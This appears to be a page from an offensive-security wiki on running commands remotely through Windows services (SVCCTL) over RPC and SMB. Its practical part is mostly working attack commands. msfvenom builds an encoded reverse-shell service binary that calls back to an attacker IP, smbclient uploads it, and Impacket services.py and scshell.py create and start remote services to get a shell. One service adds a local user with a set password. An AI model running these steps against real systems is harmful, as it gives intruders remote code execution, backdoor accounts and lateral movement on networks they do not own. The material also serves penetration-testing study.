Infiltr8 Forum GitHub

Services (SVCCTL)

Theory

Windows services can also be leveraged to run arbitrary commands since they execute a command when started. When using sc, it will try to connect to the Service Control Manager (SVCCTL) remote service program through RPC in several ways:

  • By using MS-SCMR protocols over RPC to connect EMP at port 135. WIll ask for the SVCCTL RPC Endpoint wich is a dynamic port

  • Try to reach SVCCTL Through SMB named pipes (\PIPE\svcctl) on port 445 (SMB) or 139 (SMB over NetBIOS)

Practice

Service.py

The Impacket script service.py can be use to interact with services remotely.

# create an exe as a service
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKING_IP> LPORT=<PORT> -f exe-service --platform windows -e x64/xor_dynamic  -o shell.exe

# Upload the exe to windows machine
smbclient '\\<TARGET>\smbshare' -U <user> -c "put shell.exe test.exe"

# Using impacket services.py create service remotely
services.py <DOMAIN>/<user>@<TARGET> create -name shell-svc -display my-shell-svc -path "\\\\<TARGET>\\smbshare\\shell.exe"

# Using impacket services.py start the service and get the shell
services.py <DOMAIN>/<user>@<TARGET> start -name shell-svc

# Using impacket services.py delete the service
services.py <DOMAIN>/<user>@<TARGET> delete -name shell-svc

We also can execute commands instead of a binary

# Using impacket services.py create service remotely
services.py <DOMAIN>/<user>@<TARGET> create -name addme -display addme -path "net user munra Pass123 /add"

# Using impacket services.py start the service and get the shell
services.py <DOMAIN>/<user>@<TARGET> start -name addme

# Using impacket services.py delete the service
services.py <DOMAIN>/<user>@<TARGET> delete -name addme

You will get an error starting the service but the commands will still be executed

Scshell.py

The script scshell.py can automate the process to spawn a shell

#Create a service, get shell, delete service
scshell.py domain/<user>@<TARGET>

Resources

Last updated